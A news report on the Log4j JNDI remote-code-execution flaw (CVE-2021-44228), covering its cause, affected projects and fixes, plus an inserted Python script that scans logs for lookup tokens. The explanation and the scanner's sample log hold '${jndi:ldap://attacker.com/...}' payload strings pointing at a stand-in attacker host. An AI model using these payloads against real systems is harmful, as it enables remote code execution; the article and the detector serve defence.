Vulnerability in Apache Log4j affecting many Java projects

In Apache Log4j, a popular framework for organizing logging in Java applications, a critical vulnerability has been identified that allows arbitrary code to be executed when a specially formatted value of the form "${jndi:URL}" is written to the log. The attack can be carried out against Java applications that log values received from external sources, for example when displaying problematic values in error messages.

It is noted that almost all projects using frameworks such as Apache Struts, Apache Solr, Apache Druid or Apache Flink are affected by the problem, including Steam, Apple iCloud, and Minecraft clients and servers. The vulnerability is expected to lead to a wave of mass attacks on corporate applications, repeating the history of critical vulnerabilities in the Apache Struts framework, which, by a rough estimate, is used in the web applications of 65% of Fortune 100 companies. Attempts to scan the network for vulnerable systems have already been recorded.

The problem is aggravated by the fact that a working exploit has already been published, while fixes for the stable branches have not yet been prepared. A CVE identifier has not yet been assigned. So far the fix is included only in the log4j-2.15.0-rc1 test branch. As a workaround to block the vulnerability, it is recommended to set the log4j2.formatMsgNoLookups parameter to true.

The problem is caused by the fact that log4j supports processing of special "${...}" masks in strings written to the log, through which JNDI (Java Naming and Directory Interface) queries can be executed. The attack comes down to passing a string containing the substitution "${jndi:ldap://attacker.com/a}"; when processing it, log4j sends an LDAP request to the attacker.com server asking for the path to a Java class. The path returned by the attacker's server (for example, http://second-stage.attacker.com/Exploit.class) will be loaded and executed in the context of the current process, which allows the attacker to run arbitrary code on the system with the privileges of the current application.
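Because the trigger is simply a "${jndi:...}" token landing in a logged string, a first defensive step is to scan existing logs for such tokens and note which lookup scheme and host they point at, so that incident responders can see whether anything reached the vulnerable code path. The scanner below is an added example written for this article, not code from the Log4j project or from opennet.ru; the access-log lines it runs on are constructed here for illustration, and the "attacker.com" host is the one named in the text above.

```python
"""Scan log lines for Log4j JNDI lookup tokens (defensive triage helper).

Added example for this article; not part of Log4j. The sample log lines
below are constructed for illustration.
"""
import re
from collections import Counter
from dataclasses import dataclass

# A JNDI lookup as Log4j would expand it: ${jndi:<scheme>:[//]<host>[:port][/path]}.
# Log4j lookup names are case-insensitive, so the pattern is too.
JNDI_LOOKUP = re.compile(
    r"\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:(?://)?([^}/]*)",
    re.IGNORECASE,
)

# Constructed web-server access log: one benign request, two carrying a JNDI
# lookup in the User-Agent header, and one carrying a non-JNDI "${date:...}"
# lookup that must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.com/a}"
203.0.113.9 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 404 0 "-" "${JNDI:LDAP://attacker.com:1389/x}"
203.0.113.7 - - [10/Dec/2021:12:00:04 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 10 "-" "curl/7.79"
"""


@dataclass(frozen=True)
class Finding:
    line_no: int   # 1-based line number in the scanned input
    scheme: str    # JNDI scheme in lower case, e.g. "ldap"
    host: str      # host[:port] the lookup would contact
    raw: str       # the matched token text as it appeared in the log


def scan_lines(lines):
    """Return a Finding for every JNDI lookup token found in the given lines."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        for m in JNDI_LOOKUP.finditer(line):
            findings.append(
                Finding(line_no, m.group(1).lower(), m.group(2), m.group(0))
            )
    return findings


def hosts_by_count(findings):
    """Count how often each lookup host appears, most frequent first."""
    return Counter(f.host for f in findings).most_common()


if __name__ == "__main__":
    hits = scan_lines(SAMPLE_LOG.splitlines())
    for f in hits:
        print(f"line {f.line_no}: scheme={f.scheme} host={f.host} token={f.raw}")
    print("hosts:", hosts_by_count(hits))
```

The regular expression deliberately matches the lookup prefix in any letter case, since Log4j lowercases lookup names before dispatching them; the "${date:yyyy}" line is left alone because only the jndi lookup reaches the network.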

Addendum 1: The vulnerability has been assigned the identifier CVE-2021-44228.

Addendum 2: A way to bypass the protection added in the log4j-2.15.0-rc1 release has been identified. A new update, log4j-2.15.0-rc2, has been proposed with more complete protection against the vulnerability. The code change relates to the absence of an abnormal termination when an incorrectly formatted JNDI URL is used.

Source: opennet.ru
